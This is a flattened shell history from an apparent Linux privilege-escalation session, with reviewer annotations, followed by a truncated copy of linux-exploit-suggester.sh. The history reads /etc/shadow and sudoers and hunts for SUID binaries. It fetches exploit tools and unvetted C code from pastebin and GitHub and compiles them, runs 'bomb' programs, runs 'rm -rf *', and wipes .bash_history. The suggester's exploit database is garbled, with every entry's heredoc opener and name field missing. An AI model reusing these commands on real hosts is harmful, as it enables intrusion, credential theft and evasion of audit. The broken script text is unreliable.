# NOTE(review): lines 1-5 are not a script. They are an interactive shell
# history (one or more sessions of a user "usuario", with root obtained via
# sudo/su along the way) whose command separators were lost, so the whole
# history sits on five page lines. Do not run any of it. Once flattened, a
# "#" inside a line (e.g. "sudo -s #PATH" on line 1) comments out the rest of
# that page line — a display artefact, not part of the original commands.
# The genuine script, linux-exploit-suggester.sh, starts mid-way through line
# 5 at "#!/bin/bash". The notes below cite only what each line shows; the
# purpose of the activity (a privilege-escalation exercise on a lab host, to
# judge by the taunts between "lastdragon" and "megabyte" on line 4) is an
# inference, not a fact.
#
# Line 1: two scripted blocks — "stty raw -echo", "printf command_start_<token>",
# "netstat -a -n", "printf command_done_<token>" — and
# "sh -c 'bash -c ... cat /tmp/nessus.1597883062'" look like the markers of a
# credentialed scanner (the file name says Nessus; not confirmed here). The
# rest is interactive: build and run of "bomba.c" (gcc, ./a.out — source not
# shown; the name hints at a fork/resource bomb but that is unverified),
# "wget https://www.exploit-db.com/exploits/44302" (entry not resolved here),
# reads of stray ".bash_history-*.tmp" files, $PATH and /usr/local/{bin,sbin}
# inspection, "sudo su"/"sudo -s", "cat /etc/passwd" and "cat /etc/shadow",
# login review (w, who, last, lastb, netstat) and two outbound
# "ssh root-admin@45.79.21.153" attempts to a non-local IPv4 address. One of
# the scanner markers reads "comm and_done_%s" — a page-extraction glitch,
# left as found.
echo $SHELL | awk -F'/' '{print $NF}' stty raw -echo LANG=C; printf "command_start_%s" "crqk7lqH"; netstat -a -n; printf "command_done_%s" "23SkYANT" sh -c 'bash -c '\''cat /tmp/nessus.1597883062'\''' clear id ls cd bomba ls cat bomba clear cat bomba.c pwd cd .. ls cd lost+found ls chmod +x lost+found sudo su clear ls cd .. ls hostname uname ls open . cd usuario ls cd home ls cd usuario ls clear cat bomba zls clear ls gcc bomba c gcc bomba.c ls ./a.out chmod +x a.ou ls ./a.out cat a.out wclear clear wget https://www.exploit-db.com/exploits/44302 ls bash --version uname -a htop top ls -la cat .bash_history-02436.tmp cat .bash_history-02130.tmp ls / sudo -s #PATH $PATH cd .local ls -la cd ls $PATH ls /usr/local/bin ls /usr/local/sbin ls -la /usr/local/sbin ping 8.8.8.8 bash -v whoami ls cd bomba ls -lah ./bomba chmod +x bomba ./bomba cat bomba.c nano bomba.c vim bomba.nanp vim bomba.nano vi bomba.nano ls cat a.out ./a.out ps cls clear ps cd .. ls cd lost+found/ ps cd usuario/ ls cd .. ls cd .. ls whoami pwd cd / cd /var/www/html ps su ssh root-admin@45.79.21.153 w ls ssh root-admin@45.79.21.153 history exit echo $SHELL | awk -F'/' '{print $NF}' LANG=C; printf "command_start_%s" "crqk7lqH"; netstat -a -n; printf "comm and_done_%s" "23SkYANT" sudo su sudo su - hostname open . ls /usr/local/bin ls /usr/local/sbin /usr/local/bin whoami ls -lah pwd qexit exit ls cat bomba ls ls -l su -l cat bomba.c cat a.out ls ./a.out ls ls -l cat bomba.c vi bomba.c la -ls los -la ls -la bomba sh bomba ls pwd cd .. ls cd .. ls vim.tiny history history free -h df -h ls cat /etc/*release cat /etc/release* cd /etcc cd /etc ls uname -a uname -n uname -m pwd cd cat /etc/passwd cat /etc/shadow w who last lastb netstat pwd cd .. 
# Line 2: classic local-privesc enumeration — SUID search
# ("find / -perm /4000 -type f 2>/tmp/2", "find / -perm -u=s -type f
# 2>/dev/null"; the error file is read back later with "cat 2"),
# "git clone https://github.com/pentestmonkey/unix-privesc-check.git" and
# "./upc.sh", kernel/limits recon ("cat /proc/version", "dmesg | head -1",
# "cat /etc/security/limits.conf", "cat /etc/issue"), "tail lastlog" in
# /var/log, an attempted "nmap", and a second program "bomb.c" compiled as
# "bomb_mudakucker", run repeatedly and copied to /tmp (where a
# "ks-script-*" file is also listed — the name suggests a kickstart remnant;
# unverified).
la ls cd /tmp ls nmap exit mls ls gcc bomba.v gcc bomba.c ls ./a.out ls - ls -arli ls -a ls ls- la ls cd test ls cd bomb ls ./bomb_mudakucker exit sh l ls clear cd test/ ls cd bomb/ ls pwd /home/usuario/test/bomb/bomb_mudakucker cp bomb_mudakucker /tmp cd /tmp ls ./bomb_mudakucker ls -la ./ks-script-9p4glu_2 cat 2 ls clear exit clear find / -perm /4000 -type f 2>/tmp/2 clear find / -perm -u=s -type f find / -perm -u=s -type f 2>/dev/null sudo su mkdir test cd test/ lsclear clear git clear git clone https://github.com/pentestmonkey/unix-privesc-check.git l ls ping google.com ip addrr ip addr ifconfig ip show ip ls clear ls cd unix-privesc-check/ ls ls -la ./upc.sh chmod +x upc.sh ./upc.sh ls .la ls -la cd / ls cat /etc/security/limits.conf dmesg | head -1 cat /proc/version top htop clear ls cd ls cd test mkdir bomb cd bomb/ clear nano bomb.c vim bomb.c vi bomb.v gcc bomb.v -o bomb_mudakucker gcc bomb.c -o bomb_mudakucker ls mv bomb.v bomb.c clear mv bomb.v bomb.c clear gcc bomb.c -o bomb_mudakucker ls ./bomb_mudakucker history ls clear ls -la chmod +x bomb_mudakucker ./bomb_mudakucker uname -a uname -m uname -n uname -all ls cd ls ./a.out ls bash exit ls cd /tmp ls cat 2 cat ./bomb_mudakucker q clear ./bomb_mudakucker chmod u+x bomb_mudakucker ./bomb_mudakucker ls -la cd .. l ls cd ls ls -la cat bomba.c ./bomba cat .bashrc echo $PATH cat .bash_profile clear cat .bash_profile ls -la ./a.out gcc ls cat /etc/issue ip addr ifconfig ls less bomba.c cd .. ls cd / ls cd /var/log ls tail lastlog cd ~ ls cd test/ ls exit ls cd test/ ls cd unix-privesc-check/ ls cat upc.sh ls bash -c upc.sh bash -c ./upc.sh }ls ls vi README.md ls git clone https://github.com/pentestmonkey/unix-privesc-check.git cd .. ls cd bomb/ ls cat bomb.c vi bomb_mudakucker ls cd .. ls cd .. ls cd .. ls cd .. 
# Line 3: history tampering — "rm .bash_history", "rm .bash_his*",
# "vi .bash_history" and "echo \"\" > .bash_history" — is the most
# detection-relevant item here (a defender should expect gaps, and the
# ".bash_history-*.tmp" files on line 1 may hold what was wiped). Also:
# sudoers review ("ls /etc/sudoers", "ls /etc/sudoers.d", "cat /etc/sudoers"),
# repeated "su root"/"sudo su", "cat /etc/shadow" and "cat /etc/passwd",
# "ls -la /sbin/halt", "grep bash /etc/passwd", "sudo nano" on the compiled
# binaries, "apt install nano", and a search for *.txt under /home.
# "loadkeys la-latin1" and names like "usuario"/"prueba.sh" suggest a
# Spanish-keyboard operator.
ls ps ax htop q ps ax w uname uname -all uname - uname -a w who cd rm .bash_history exit ls ./bomba sud loadkeys la-latin1 sudo su exit ls cd bomba ls cd test ls cd bomb ls sudo nano bomb_mudakucker cd .. ls cd .. ls sudo nano a.out nano a.out apt install nano pwd show neofetch exit ls whoami su sudo su cd a.out cd test ls ./bomb cd bomb ls cat bomba clear pwd ifconfig.ma who su ls cd .. ls cd .. ls pwd cd ls cd test/ ls cd bomb/ ls nano bomb nano bomb.c vi bomb.c clear ls vi bomb_mudakucker exit ls find . file * ls test/ ls test/unix-privesc-check/ cd test/unix-privesc-check/ ls cat README.md cd .. ls cd .. ls file bomba ls -l file a.out exit cd test la ls xd clear ls cd .. ls clear cd test ls -l ls ps ax ls ll history top exit cat /etc/passwd ls cat bomba.c ls /etc/sudoers ls /etc/sudoers.d cat /etc/os-release cat /etc/sudoers sudo su ls su root usuario su root pwd ls ls .. df -h lsblk blkid pwd ls ls -la cat .bash_logout cat .bashrc rm .bash_his* ls ll ls -la cat .bash_history more .bash_history vi .bash_history ll ls -la echo "" > .bash_history cat .bash_profile ls test cat /etc/shadow cat /etc/passwd echo $PATH ls -la /sbin/halt grep bash /etc/passwd su root ls /etc ls -la / ls htop ls ps -ef ls su root ls / ls .. ls sudo su su root ls more bomba ls clear ls ll sudo su more bomba more bomba.c ls cd .. ls cd /etc ls cd .. ls pwd clear find -name "*.txt" ls cd /home l ls cd usuario/ ls cd .. ls find /home/miusuario -name "*.txt" find /h -name "*.txt" pwd find /home -name "*.txt" find /home -name "*." 
# Line 4: fetches linux-exploit-suggester twice ("wget https://raw.github
# usercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
# -O les.sh" — the script whose header appears on line 5; a raw download with
# no integrity check, see the note on line 5). Then: reads of another user's
# history ("more /home/usuario/.bash_history"), /root, /etc/shadow,
# /etc/sudoers, "visudo", "sudo -l", "vi /etc/passwd" and "vi .bashrc"
# (outcome of either edit not visible; both are common persistence spots),
# local mail ("cat /var/spool/mail/usuario"), sockets ("netstat -pnta",
# "ss -a"), "cat /etc/group", two infinite "for (( ; ; )); do echo ...; done"
# loops aimed at another user, and clean-up ("rm -rf a.out", "rm -rf bomba",
# "rm -rf *" apparently inside test/bomb).
find /home -name "*.*" /home/usuario/.bash_history more /home/usuario/.bash_history htop ps ps -a wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh ls cd usuario/ ls wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh ping google.es nano prueba.sh clear ls clear uname -a ifconfig cd /var/www/html cd /var/ww/ cd /var/www ls cleart clear nano more /etc/security/limits.conf clear ls -la /etc/security/limits.conf whoami pstree tree ls ps ls /usr/bin cd /root more /root/ more /etc/shadow more /etc/ more /etc/passwd sudo su more /etc/sudoers su root ls ps ls htop top ls /usr/bin/top ls -la /usr/bin/top visudo vi vi enum.sh ls ./a.out ls ps clear ls ./bomba ls ls -arli vi .bashrc ls -arli history ping wget wget -v wget --help uname -m uname -a vim vi ls cat xds.hj ls rm -rf xds.hj ls cat test.sh ls eixt exit ls -la w who last ls ls -la sudo -l ls -la / ps ps -aux ls -la /usr/bin ls pwd env cat /var/spool/mail/usuario file /var/spool/mail/usuario netstat -pnta ss ss -a cat cat /etc/passwd cat /etc/shadow cat /etc/group ls -la pwd cat .bash_history echo "lastdragon se la come :v " for (( ; ; )); do echo "megabyte > last_dragon" ; done for (( ; ; )); do echo "megabyte > last_dragon"; sleep 1 ; done exit ls exit ls cat les.sh cd test ls cd bomb/ ls ./bomb_mudakucker ls cat bomb.c gcc exit ls rm -rf a.out ls rm -rf bomba ls exit ls gcc bomba.c ls ./a.out chmod +x a.out ls ls -alr ls cd test ls cd unix-privesc-check/ ls bash upc.sh l ls cd tools/generate_ cd tools/ ls bash generate_banned.sh cat generate_n cat generate_banned.sh ls nano generate_docs.sh vi generate_docs.sh ls history awk cat /etc/passwd vi /etc/passw vi /etc/passwd ls exit ls exit ls exit ls cd test ls cd bomb ls exit ls rm -rf rm -rf * ls cd .. ls cd .. 
# Line 5: C source pulled from anonymous paste sites ("wget https://pastebin
# .com/raw/pQGayDmp -O ahshs.c", then a hastebin URL) and compiled — code of
# unknown provenance that should be hashed and read before it is built; a
# one-liner written to hd.c that binds a register variable to esp and prints
# it (its "#include" header name is missing in this copy — everything between
# "<" and ">" appears to have been stripped when the page was extracted);
# "rm -rf *" twice; looks at /etc/exports, /lib/systemd/portable/profile,
# /sbin/chkconfig, "vi resolv.conf"; "chmod 777" on several scripts and on
# the kernelpop zip and *.py ("git clone https://github.com/spencerdodd/
# kernelpop", "python3 kernelpop.py"). The gcc/x86_64-redhat-linux/8 path and
# /sbin/chkconfig point to an EL/Fedora-family box, while "apt install nano"
# on line 3 points to a Debian-family one — possibly two different hosts.
# The history ends at "cd .. ls"; the text from "#!/bin/bash" onward is the
# header of linux-exploit-suggester.sh v1.1 (VERSION=v1.1 follows on the next
# page line). The exploit database after it reads, e.g.,
# "EXPLOITS[((n++))]=$(cat <=2.6.5,ver<=2.6.11 Tags: ... EOF )": the heredoc
# opener and the Name:/Reqs: prefix of every entry are gone, so this copy is
# not runnable and cannot be trusted as a reference for which CVEs it checks.
# Obtain the script from the upstream repository and verify its integrity
# (release tag / checksum) before running it on any host.
ls cd wget make whoami sudo sudo su su root wget https://pastebin.com/raw/pQGayDmp -O ahshs.c wget https://hastebin.com/raw/fujipavago -O ahshs.c nano vim editor echo "#include void main() { register int i asm("esp"); printf("$esp = %#010x\n", i); }" > hd.c make hd.c clag clang gcc gcc hd.c cat hd.c g++ hd.c rm -rf * ls sh test.sh /lib/systemd/portable/profile cd /lib/systemd/portable/profile ls ls -ka ls -la cd default/ ls more service.conf ls more service.conf /etc/exports cd /etc/exports ls more /etc/exports /etc/exports clear ls pwd cd .. ls cd . cd .. lks ls cd .. ls more resolv.conf vi resolv.conf ls ls -la systemd-sysv-install .systemd-sysv-install ./systemd-sysv-install ./systemd-sys/sbin/chkconfigv-install /sbin/chkconfig ls /sbin/chkconfig ls -la /sbin/chkconfig ls -la /sbin/ ls -la /sbin/chkconfig/sbin/chkconfig ls clear ls more systemd-sysv-install cd user ls cd ,, ls cd .. ls clear ls ls -la cd .. ls cd gcc ls cd x86_64-redhat-linux/ ls cd 8/ ls ls -la more libgomp.so cd .. ls cd .. ks ls cd .. lls cd .. ls cd clear ls vi test1.sh ls chmod 777 test1.sh sh test1.sh + clear ls vi test2.sh chmod 777 test2.sh clear sh test2.sh clear sh test2.sh clear sh test2.sh ls sh test2.sh clear sh test2.sh -l 0 sh test2.sh ls cd home ls pwd ls cd .. ls cd usuario/ ls ls -ka vi test.sh ls chmod 777 test.sh ls sh test.sh -l 0 ls sh test.sh -l 0 -i ks ls more ahshs.c ls rm test.sh git clone https://github.com/spencerdodd/kernelpop ping google.es ls nc - nc ls curl https://github.com/spencerdodd/kernelpop ls scp unzip ls chmod 777 kernelpop-master.zip ls unzip kernelpop-master.zip ls cd kernelpop-master ls chmod 777 *.py python kernelpop.py python3 kernelpop.py sh create_executable.sh ls python3 python py pytho pythonb clear cd .. ls #!/bin/bash # # Copyright (c) 2016-2020, @_mzet_ # # linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY. # This is free software, and you are welcome to redistribute it # under the terms of the GNU General Public License. 
See LICENSE # file for usage of this software. # VERSION=v1.1 # bash colors #txtred="\e[0;31m" txtred="\e[91;1m" txtgrn="\e[1;32m" txtgray="\e[0;37m" txtblu="\e[0;36m" txtrst="\e[0m" bldwht='\e[1;37m' wht='\e[0;36m' bldblu='\e[1;34m' yellow='\e[1;93m' lightyellow='\e[0;93m' # input data UNAME_A="" # parsed data for current OS KERNEL="" OS="" DISTRO="" ARCH="" PKG_LIST="" # kernel config KCONFIG="" CVELIST_FILE="" opt_fetch_bins=false opt_fetch_srcs=false opt_kernel_version=false opt_uname_string=false opt_pkglist_file=false opt_cvelist_file=false opt_checksec_mode=false opt_full=false opt_summary=false opt_kernel_only=false opt_userspace_only=false opt_show_dos=false opt_skip_more_checks=false opt_skip_pkg_versions=false ARGS= SHORTOPTS="hVfbsu:k:dp:g" LONGOPTS="help,version,full,fetch-binaries,fetch-sources,uname:,kernel:,show-dos,pkglist-file:,short,kernelspace-only,userspace-only,skip-more-checks,skip-pkg-versions,cvelist-file:,checksec" ## exploits database declare -a EXPLOITS declare -a EXPLOITS_USERSPACE ## temporary array for purpose of sorting exploits (based on exploits' rank) declare -a exploits_to_sort declare -a SORTED_EXPLOITS ############ LINUX KERNELSPACE EXPLOITS #################### n=0 EXPLOITS[((n++))]=$(cat <=2.6.5,ver<=2.6.11 Tags: Rank: 1 exploit-db: 1397 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.2 Tags: Rank: 1 exploit-db: 160 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.13,ver<=2.6.17 Tags: Rank: 1 exploit-db: 2031 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.13,ver<=2.6.17 Tags: Rank: 1 exploit-db: 2004 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.13,ver<=2.6.17 Tags: Rank: 1 exploit-db: 2005 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.13,ver<=2.6.17 Tags: Rank: 1 exploit-db: 2006 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.13,ver<=2.6.17 Tags: Rank: 1 exploit-db: 2011 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.8,ver<=2.6.16 Tags: Rank: 1 bin-url: https://web.archive.org/web/20111103042904/http://tarantula.by.ru/localroot/2.6.x/h00lyshit exploit-db: 2013 EOF ) EXPLOITS[((n++))]=$(cat 
<=2.6.17,ver<=2.6.24 Tags: Rank: 1 exploit-db: 5092 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.23,ver<=2.6.24 Tags: Rank: 1 exploit-db: 5093 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.11,ver<=2.6.22 Tags: Rank: 1 exploit-db: 6851 Comments: world-writable sgid directory and shell that does not drop sgid privs upon exec (ash/sash) are required EOF ) EXPLOITS[((n++))]=$(cat <=2.6.25,ver<=2.6.29 Tags: Rank: 1 exploit-db: 8369 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.30 Tags: ubuntu=7.10,RHEL=4,fedora=4|5|6|7|8|9|10|11 Rank: 1 exploit-db: 9479 Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.30 Tags: ubuntu=9.04 Rank: 1 analysis-url: https://xorl.wordpress.com/2009/07/16/cve-2009-1895-linux-kernel-per_clear_on_setid-personality-bypass/ src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9435.tgz exploit-db: 9435 Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.30 Tags: Rank: 1 src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9436.tgz exploit-db: 9436 Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.30 Tags: Rank: 1 src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9641.tar.gz exploit-db: 9641 Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.30 Tags: ubuntu=8.10,RHEL=4|5 Rank: 1 exploit-db: 9545 Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.1,ver<=2.6.19 Tags: Rank: 1 src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9574.tgz exploit-db: 9574 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.1,ver<=2.6.19 Tags: debian=4 Rank: 1 exploit-db: 9575 EOF ) 
EXPLOITS[((n++))]=$(cat <=2.6.1,ver<=2.6.19,x86 Tags: fedora=4|5|6,RHEL=4 Rank: 1 exploit-db: 9542 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.31 Tags: Rank: 1 exploit-db: 33321 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.31 Tags: Rank: 1 exploit-db: 33322 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.31 Tags: Rank: 1 exploit-db: 10018 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.26,ver<=2.6.34 Tags: debian=6.0{kernel:2.6.(32|33|34|35)-(1|2|trunk)-amd64},ubuntu=(10.04|10.10){kernel:2.6.(32|35)-(19|21|24)-server} Rank: 1 bin-url: https://web.archive.org/web/20111103042904/http://tarantula.by.ru/localroot/2.6.x/kmod2 bin-url: https://web.archive.org/web/20111103042904/http://tarantula.by.ru/localroot/2.6.x/ptrace-kmod bin-url: https://web.archive.org/web/20160602192641/https://www.kernel-exploits.com/media/ptrace_kmod2-64 exploit-db: 15023 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.18,ver<=2.6.34 Tags: ubuntu=9.10 Rank: 1 exploit-db: 12130 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.18,ver<=2.6.36 Tags: ubuntu=10.04{kernel:2.6.32-24-generic} Rank: 1 bin-url: https://web.archive.org/web/20160602192641/https://www.kernel-exploits.com/media/can_bcm exploit-db: 14814 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.30,ver<2.6.37 Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},ubuntu=10.04{kernel:2.6.32-(21|24)-generic} Rank: 1 analysis-url: http://www.securityfocus.com/archive/1/514379 src-url: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c bin-url: https://web.archive.org/web/20160602192641/https://www.kernel-exploits.com/media/rds bin-url: https://web.archive.org/web/20160602192641/https://www.kernel-exploits.com/media/rds64 exploit-db: 15285 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.36 Tags: ubuntu=(10.04|9.10){kernel:2.6.(31|32)-(14|21)-server} Rank: 1 bin-url: http://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/half-nelson3 exploit-db: 
17787 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.34,ver<=2.6.36,x86 Tags: ubuntu=10.10 Rank: 1 exploit-db: 15916 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.34,ver<=2.6.36 Tags: ubuntu=10.10 Rank: 1 exploit-db: 15944 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.36 Tags: Rank: 1 exploit-db: 15774 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.36 Tags: ubuntu=10.04 Rank: 1 exploit-db: 15150 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.33 Tags: RHEL=5 Rank: 1 exploit-db: 15024 EOF ) EXPLOITS[((n++))]=$(cat <=3.0.0,ver<=3.1.0 Tags: ubuntu=(10.04|11.10){kernel:3.0.0-12-(generic|server)} Rank: 1 analysis-url: https://git.zx2c4.com/CVE-2012-0056/about/ src-url: https://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/memodipper bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/memodipper64 exploit-db: 18411 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.36 Tags: ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)},ubuntu=10.04{kernel:2.6.32-(21|24)-server} Rank: 1 src-url: http://vulnfactory.org/exploits/full-nelson.c bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/full-nelson bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/full-nelson64 exploit-db: 15704 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.32,ver<3.8.9,x86_64 Tags: RHEL=6,ubuntu=12.04{kernel:3.2.0-(23|29)-generic},fedora=16{kernel:3.1.0-7.fc16.x86_64},fedora=17{kernel:3.3.4-5.fc17.x86_64},debian=7{kernel:3.2.0-4-amd64} Rank: 1 analysis-url: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/ bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/perf_swevent bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/perf_swevent64 exploit-db: 26131 author: Andrea 'sorbo' Bittau Comments: No SMEP/SMAP 
bypass EOF ) EXPLOITS[((n++))]=$(cat <=2.6.32,ver<3.8.9,x86_64 Tags: ubuntu=12.04{kernel:3.(2|5).0-(23|29)-generic} Rank: 1 analysis-url: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/ src-url: https://cyseclabs.com/exploits/vnik_v1.c exploit-db: 33589 author: Vitaly 'vnik' Nikolenko Comments: No SMEP/SMAP bypass EOF ) EXPLOITS[((n++))]=$(cat <=2.6.18,ver<3.7.6 Tags: Rank: 1 exploit-db: 27297 EOF ) EXPLOITS[((n++))]=$(cat <=3.0.1,ver<3.8.9 Tags: Rank: 1 analysis-url: http://www.openwall.com/lists/oss-security/2013/04/29/1 exploit-db: 25450 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.32,ver<3.8.9 Tags: RHEL=6 Rank: 1 analysis-url: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/ exploit-db: 25444 EOF ) EXPLOITS[((n++))]=$(cat <=3.4.0,ver<=3.13.1,CONFIG_X86_X32=y Tags: ubuntu=13.10 Rank: 1 analysis-url: http://blog.includesecurity.com/2014/03/exploit-CVE-2014-0038-x32-recvmmsg-kernel-vulnerablity.html bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/timeoutpwn64 exploit-db: 31346 Comments: CONFIG_X86_X32 needs to be enabled EOF ) EXPLOITS[((n++))]=$(cat <=3.4.0,ver<=3.13.1,CONFIG_X86_X32=y Tags: ubuntu=(13.04|13.10){kernel:3.(8|11).0-(12|15|19)-generic} Rank: 1 analysis-url: http://blog.includesecurity.com/2014/03/exploit-CVE-2014-0038-x32-recvmmsg-kernel-vulnerablity.html exploit-db: 31347 Comments: CONFIG_X86_X32 needs to be enabled EOF ) EXPLOITS[((n++))]=$(cat <=2.6.31,ver<=3.14.3 Tags: Rank: 1 analysis-url: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html exploit-db: 33516 EOF ) EXPLOITS[((n++))]=$(cat <=3.0.1,ver<=3.14 Tags: Rank: 0 analysis-url: https://cyseclabs.com/page?n=02012016 exploit-db: 32926 EOF ) EXPLOITS[((n++))]=$(cat <=3.0.1,ver<=3.13 Tags: ubuntu=12.04 Rank: 1 analysis-url: http://www.openwall.com/lists/oss-security/2014/06/10/4 exploit-db: 33824 EOF ) 
EXPLOITS[((n++))]=$(cat <=3.0.1,ver<=3.8 Tags: ubuntu=12.04 Rank: 1 analysis-url: http://www.openwall.com/lists/oss-security/2014/07/08/16 exploit-db: 34134 EOF ) EXPLOITS[((n++))]=$(cat <=3.2,ver<=3.15.6 Tags: Rank: 1 analysis-url: https://cyseclabs.com/page?n=01102015 exploit-db: 36267 EOF ) EXPLOITS[((n++))]=$(cat <=3.0.1,ver<=3.16.1 Tags: Rank: 1 exploit-db: 34923 EOF ) EXPLOITS[((n++))]=$(cat <=3.0.1,ver<3.17.5,x86_64 Tags: RHEL<=7,fedora=20 Rank: 1 analysis-url: http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/ src-url: http://site.pi3.com.pl/exp/p_cve-2014-9322.tar.gz exploit-db: author: Rafal 'n3rgal' Wojtczuk & Adam 'pi3' Zabrocki EOF ) EXPLOITS[((n++))]=$(cat <=3.13,ver<4.1.6,x86_64 Tags: Rank: 1 analysis-url: http://www.openwall.com/lists/oss-security/2015/08/04/8 exploit-db: 37722 EOF ) EXPLOITS[((n++))]=$(cat <=3.13.0,ver<=3.19.0 Tags: ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic},ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic} Rank: 1 analysis-url: http://seclists.org/oss-sec/2015/q2/717 bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/ofs_32 bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/ofs_64 exploit-db: 37292 EOF ) EXPLOITS[((n++))]=$(cat <=3.0.0,ver<=4.3.3 Tags: Rank: 1 analysis-url: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/ exploit-db: 39230 EOF ) EXPLOITS[((n++))]=$(cat <=3.0.0,ver<=4.3.3 Tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic} Rank: 1 analysis-url: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/ exploit-db: 39166 EOF ) EXPLOITS[((n++))]=$(cat <=3.10,ver<4.4.1 Tags: Rank: 0 analysis-url: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/ exploit-db: 40003 Comments: Exploit takes about ~30 minutes to run. 
Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working EOF ) EXPLOITS[((n++))]=$(cat <=3.0.0,ver<=4.4.8 Tags: ubuntu=14.04,fedora=22 Rank: 1 analysis-url: https://xairy.github.io/blog/2016/cve-2016-2384 src-url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c exploit-db: 41999 Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user author: Andrey 'xairy' Konovalov EOF ) EXPLOITS[((n++))]=$(cat <=4.4.0,ver<=4.4.0,cmd:grep -qi ip_tables /proc/modules Tags: ubuntu=16.04{kernel:4.4.0-21-generic} Rank: 1 src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40053.zip Comments: ip_tables.ko needs to be loaded exploit-db: 40049 author: Vitaly 'vnik' Nikolenko EOF ) EXPLOITS[((n++))]=$(cat <=4.4,ver<4.5.5,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1 Tags: ubuntu=16.04{kernel:4.4.0-21-generic} Rank: 1 analysis-url: https://bugs.chromium.org/p/project-zero/issues/detail?id=808 src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1 exploit-db: 40759 author: Jann Horn EOF ) EXPLOITS[((n++))]=$(cat <=2.6.22,ver<=4.8.3 Tags: 